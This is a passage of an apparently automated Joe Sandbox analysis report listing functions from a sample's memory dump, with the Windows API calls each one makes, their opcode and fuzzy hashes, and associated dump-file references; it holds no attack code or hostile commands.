Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: d530a7ce761dec0c62fe0d3f88ceb92ddef751e4eb068c9e81d4d0031c94c4d8
Instruction ID: d62b22751eac99a54060e2c346303f94439224ddc0835574421c447fa838cd6d
Opcode Fuzzy Hash: d530a7ce761dec0c62fe0d3f88ceb92ddef751e4eb068c9e81d4d0031c94c4d8
Instruction Fuzzy Hash: 1921A131209521AFD714DB24C945FAABB99AF85334F24C258F8268B2D2CB75ED81CBD0

Function 0098825C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

Part of subcall function 009896E4: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00988271,?,000000FF,?,009890BB,00000000,?,0000001C,?,?), ref: 009896F3
Part of subcall function 009896E4: lstrcpyW.KERNEL32(00000000,?,?,00988271,?,000000FF,?,009890BB,00000000,?,0000001C,?,?,00000000), ref: 00989719
Part of subcall function 009896E4: lstrcmpiW.KERNEL32(00000000,?,00988271,?,000000FF,?,009890BB,00000000,?,0000001C,?,?), ref: 0098974A

lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,009890BB,00000000,?,0000001C,?,?,00000000), ref: 0098828A
lstrcpyW.KERNEL32(00000000,?,?,009890BB,00000000,?,0000001C,?,?,00000000), ref: 009882B0
lstrcmpiW.KERNEL32(00000002,cdecl,?,009890BB,00000000,?,0000001C,?,?,00000000), ref: 009882EB

Strings

cdecl, xrefs: 009882E2

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 187f525c6a73d9148856a8aa5fb53118ba68dee7f8759d05ed2e5ba7bbdf1dc7
Instruction ID: 17c10249c1b883322e09c4656a079cfe503b3c4eb61254433be9ff7f48a4f2a6
Opcode Fuzzy Hash: 187f525c6a73d9148856a8aa5fb53118ba68dee7f8759d05ed2e5ba7bbdf1dc7
Instruction Fuzzy Hash: BF11D33A204242ABCB15AF78D845E7B77A9FF897A0B50412AF942C7350FF31D811D7A1

Function 009B60FF Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001060,?,00000004), ref: 009B615A
_wcslen.LIBCMT ref: 009B616C
_wcslen.LIBCMT ref: 009B6177
SendMessageW.USER32(?,00001002,00000000,?), ref: 009B62B5

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: MessageSend_wcslen
String ID:
API String ID: 455545452-0
Opcode ID: b7616a3ba437a376e0f66f91a4155b3b6d515f0236e497ebf20cac1c4fb08c23
Instruction ID: e422657e75a8992cb5c693520fed22d1a5df4bb544f25ac631d4c62cad3e8025
Opcode Fuzzy Hash: b7616a3ba437a376e0f66f91a4155b3b6d515f0236e497ebf20cac1c4fb08c23
Instruction Fuzzy Hash: A1110071610208A6DB20DFA48EC4FFF7BBCEB55370B14452AFA11D6081EB78D940CB60

Function 00952079 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c992b56b81c577e53417c5190acf2d3a5ed165ea6c27374b3c30ac86360d5ec3
Instruction ID: aa860c179741796d91a86d258652dc9932c219ac4e8350e8253faaa5370f70b0
Opcode Fuzzy Hash: c992b56b81c577e53417c5190acf2d3a5ed165ea6c27374b3c30ac86360d5ec3
Instruction Fuzzy Hash: C701A7B221B2167EF621A77E6CC0F27671DDF9237AB300725FD21951D1EA608C489360

Function 00982374 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00982394
SendMessageW.USER32(?,000000C9,?,00000000), ref: 009823A6
SendMessageW.USER32(?,000000C9,?,00000000), ref: 009823BC
SendMessageW.USER32(?,000000C9,?,00000000), ref: 009823D7

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 2a9df8ec471ba332d87c15d8803d4089024d8c9860092c5386105ee720ab2a65
Instruction ID: 9f2b09db96d16074b8564af34e123d0c3490b4b808b78642d458021ccd425427
Opcode Fuzzy Hash: 2a9df8ec471ba332d87c15d8803d4089024d8c9860092c5386105ee720ab2a65
Instruction Fuzzy Hash: BA110C7A901218FFDB119B95CD85F9DBB78FB08750F200096E601B7290D671AE10DB94

Function 00921AAC Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 0092249F: GetWindowLongW.USER32(00000000,000000EB), ref: 009224B0

DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00921AF4
GetClientRect.USER32(?,?), ref: 009631F9
GetCursorPos.USER32(?), ref: 00963203
ScreenToClient.USER32(?,?), ref: 0096320E

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 7b232be340b0317d3fdb367a999f9528f7ec6f82c19c730f283e000181c03cb1
Instruction ID: 4cf7a72edb7561670deffa3021b813088d89d90708c82c8eb52281cf4a8f6897
Opcode Fuzzy Hash: 7b232be340b0317d3fdb367a999f9528f7ec6f82c19c730f283e000181c03cb1
Instruction Fuzzy Hash: 85118C31A05029EBCB10DFA8EA469FE77B8EB45350F104552F902E3140D770BA91DBA1

Function 0098EAED Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0098EB14
MessageBoxW.USER32(?,?,?,?), ref: 0098EB47
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0098EB5D
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0098EB64

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: a29cc21d5a79ba5d56237b5b490e96f1a1e34c5f71214075f14dfac3bdbeabcc
Instruction ID: 7d57c1879c717b4ce906c2811e10e71f332029281dd42aeffa7256a5e11cc82e
Opcode Fuzzy Hash: a29cc21d5a79ba5d56237b5b490e96f1a1e34c5f71214075f14dfac3bdbeabcc
Instruction Fuzzy Hash: F31126B691C218BBC701ABA89C05B9F7FADAB45320F004216F816E3390E6B4C90497A0

Function 0094D53C Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,?,0094D369,00000000,00000004,00000000), ref: 0094D588
GetLastError.KERNEL32 ref: 0094D594
__dosmaperr.LIBCMT ref: 0094D59B
ResumeThread.KERNEL32(00000000), ref: 0094D5B9

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Thread$CreateErrorLastResume__dosmaperr
String ID:
API String ID: 173952441-0
Opcode ID: 72400755c531520a6097ae1ad343ee3d7835f8d89f6d3d18857bfe43c35aa7b6
Instruction ID: 0977c63494ed21082dd655c6bd51def529a785219a4d711dbc556572fd7fcf29
Opcode Fuzzy Hash: 72400755c531520a6097ae1ad343ee3d7835f8d89f6d3d18857bfe43c35aa7b6
Instruction Fuzzy Hash: 2301F93A4161147BDB246FA5DC09FAE7B6CEF81339F100319F925861E4DF708800D6A1

Function 00927873 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 009278B1
GetStockObject.GDI32(00000011), ref: 009278C5
SendMessageW.USER32(00000000,00000030,00000000), ref: 009278CF

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 2503e701ef55793b35bc71bb3f740667c967e580ef868fd97d9d87d96faf9d4f
Instruction ID: ed289dd940fc9cbb6a40b502221f295990cc5bcbdd9531592147170e51b989a4
Opcode Fuzzy Hash: 2503e701ef55793b35bc71bb3f740667c967e580ef868fd97d9d87d96faf9d4f
Instruction Fuzzy Hash: A511AD7250A119BFDF065FD0EC98EEABB6DFF48364F040215FA0062120D7319C60EBA0

Function 009533E6 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000364,00000000,00000000,?,0095338D,00000364,00000000,00000000,00000000,?,009535FE,00000006,FlsSetValue), ref: 00953418
GetLastError.KERNEL32(?,0095338D,00000364,00000000,00000000,00000000,?,009535FE,00000006,FlsSetValue,009C3260,FlsSetValue,00000000,00000364,?,009531B9), ref: 00953424
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0095338D,00000364,00000000,00000000,00000000,?,009535FE,00000006,FlsSetValue,009C3260,FlsSetValue,00000000), ref: 00953432

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 3fb923cba2aab3e9b1ab329d19ca7f9e6f3a6d8cbdf92892dbb370989382016e
Instruction ID: 3e4fd6135804ef4b4752e16ab84056a19e01fa6a182611fa3bab2f8062240540
Opcode Fuzzy Hash: 3fb923cba2aab3e9b1ab329d19ca7f9e6f3a6d8cbdf92892dbb370989382016e
Instruction Fuzzy Hash: CE01D432626222ABCB22CF7A9C449563B9CAF04BF27208620FD06D71A0D735DD05C7E0

Function 0098BA6F Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0098B69A,?,00008000), ref: 0098BA8B
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0098B69A,?,00008000), ref: 0098BAB0
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0098B69A,?,00008000), ref: 0098BABA
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0098B69A,?,00008000), ref: 0098BAED

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 110667ea0a411503f0dda0c26e7d83a97d9424d92b824f19dae5abb8c4014b25
Instruction ID: ab67173b499048490041abaf1795d407b8b5b95dfa5948bf140f8fecb242bf50
Opcode Fuzzy Hash: 110667ea0a411503f0dda0c26e7d83a97d9424d92b824f19dae5abb8c4014b25
Instruction Fuzzy Hash: 1A118E75C0951DDBCF08EFE8E948BEEBBB8BF09711F140185D541B2240DB309650DB61

Function 009B886F Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 009B888E
ScreenToClient.USER32(?,?), ref: 009B88A6
ScreenToClient.USER32(?,?), ref: 009B88CA
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 009B88E5

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: 4cbf721129c1b494dd0f3718fec7d5a125f7c451cf37301dd8c4342eae8aa7d1
Instruction ID: 5501c2dd9e952c379e0b066886775559c92754f6992714ff5007eee1ae830f91
Opcode Fuzzy Hash: 4cbf721129c1b494dd0f3718fec7d5a125f7c451cf37301dd8c4342eae8aa7d1
Instruction Fuzzy Hash: 241174B9D01209EFDB01CF98C9849EEBBF9FB08310F104156E915E3210E735AA50DF50

Function 009836F4 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00983712
GetWindowThreadProcessId.USER32(?,00000000), ref: 00983723
GetCurrentThreadId.KERNEL32 ref: 0098372A
AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00983731

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 2d9f8fe2e0ce7c5caf80a412d6650085a7d6ad252c733ee2c3c67950e7e64e18
Instruction ID: 6c711edfb40be33e07d95390eaf3698086c5c3cca1cbcfe7dc879a51b5e6fee9
Opcode Fuzzy Hash: 2d9f8fe2e0ce7c5caf80a412d6650085a7d6ad252c733ee2c3c67950e7e64e18
Instruction Fuzzy Hash: 78E06DB1116224BADA2027A29D8DEEB7F6CDB42BB1F400119F106D2180EAA4CA40E2B0

Function 009B92BF Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00921F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00921F87
Part of subcall function 00921F2D: SelectObject.GDI32(?,00000000), ref: 00921F96
Part of subcall function 00921F2D: BeginPath.GDI32(?), ref: 00921FAD
Part of subcall function 00921F2D: SelectObject.GDI32(?,00000000), ref: 00921FD6

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 009B92E3
LineTo.GDI32(?,?,?), ref: 009B92F0
EndPath.GDI32(?), ref: 009B9300
StrokePath.GDI32(?), ref: 009B930E

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 2e9b280e218a3f922601db6cead2f4fc35ccfbad43db57fac1344f530a7927ad
Instruction ID: c702ca2ba34ccad14b00b9799f18d6a6821bfd457bdfe4085e5113ec4c49baf9
Opcode Fuzzy Hash: 2e9b280e218a3f922601db6cead2f4fc35ccfbad43db57fac1344f530a7927ad
Instruction Fuzzy Hash: 36F05E3202A269BBDB126F54AE0EFDE3F69AF0A330F048100FA11611E1C7B55561EFA5

Function 009221A0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 009221BC
SetTextColor.GDI32(?,?), ref: 009221C6
SetBkMode.GDI32(?,00000001), ref: 009221D9
GetStockObject.GDI32(00000005), ref: 009221E1

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: 56023be6af0f9edbd66e62bbba8da21cf382e1558487d3ebc9b7c39dee36b779
Instruction ID: a008c5e6eac393125f5c37cec1c9e53f8e1a1d3c9a7e1870ead831925d9a72b9
Opcode Fuzzy Hash: 56023be6af0f9edbd66e62bbba8da21cf382e1558487d3ebc9b7c39dee36b779
Instruction Fuzzy Hash: 1EE06D31259240BADB215B78BC09BE83B65AB12336F04C329F7BA580E0D7728640AB10

Function 0097EC36 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0097EC36
GetDC.USER32(00000000), ref: 0097EC40
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0097EC60
ReleaseDC.USER32(?), ref: 0097EC81

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: be91a38e74a9deab3fde694e1e6c00f15a290263e221119bcb5342f18f1d0180
Instruction ID: 986b3e49437a3019c70f7daf2e569b6d48aac0a64cd04e8cd5bb5607e0e3940c
Opcode Fuzzy Hash: be91a38e74a9deab3fde694e1e6c00f15a290263e221119bcb5342f18f1d0180
Instruction Fuzzy Hash: E6E01A75C19205DFCB41AFA0DA48A5DBBB1EB48320F108559E84AE3250D7385901AF10

Function 0097EC4A Relevance: 6.0, APIs: 4, Instructions: 18COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0097EC4A
GetDC.USER32(00000000), ref: 0097EC54
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0097EC60
ReleaseDC.USER32(?), ref: 0097EC81

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 91f937a296854c21ee849f73b8a98158260032526ba49895e032fe75e4a8927e
Instruction ID: ad619cf620bb9795e607fa7d7c2fcf656f37cd40e66d2f4cca6f2ed62e81413f
Opcode Fuzzy Hash: 91f937a296854c21ee849f73b8a98158260032526ba49895e032fe75e4a8927e
Instruction Fuzzy Hash: 5DE01A74C19205DFCB409FA0DA48A5DBBB1AB48320F108519E849E3250D7385901AF00

Function 009957CC Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON

Download Yara Rule

APIs

Part of subcall function 009241EA: _wcslen.LIBCMT ref: 009241EF

WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00995919

Strings

LPT, xrefs: 00995840
*, xrefs: 00995855

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Connection_wcslen
String ID: *$LPT
API String ID: 1725874428-3443410124
Opcode ID: cc240e94e856a3a8b9ecdfa7fc58231dc1bfc740d48f4ceaa5e584809e6cbcd4
Instruction ID: be0363cb8d99f88c65fd9f35c41ee5fe38bb54ef6afa0e4f54891cc54ac69886
Opcode Fuzzy Hash: cc240e94e856a3a8b9ecdfa7fc58231dc1bfc740d48f4ceaa5e584809e6cbcd4
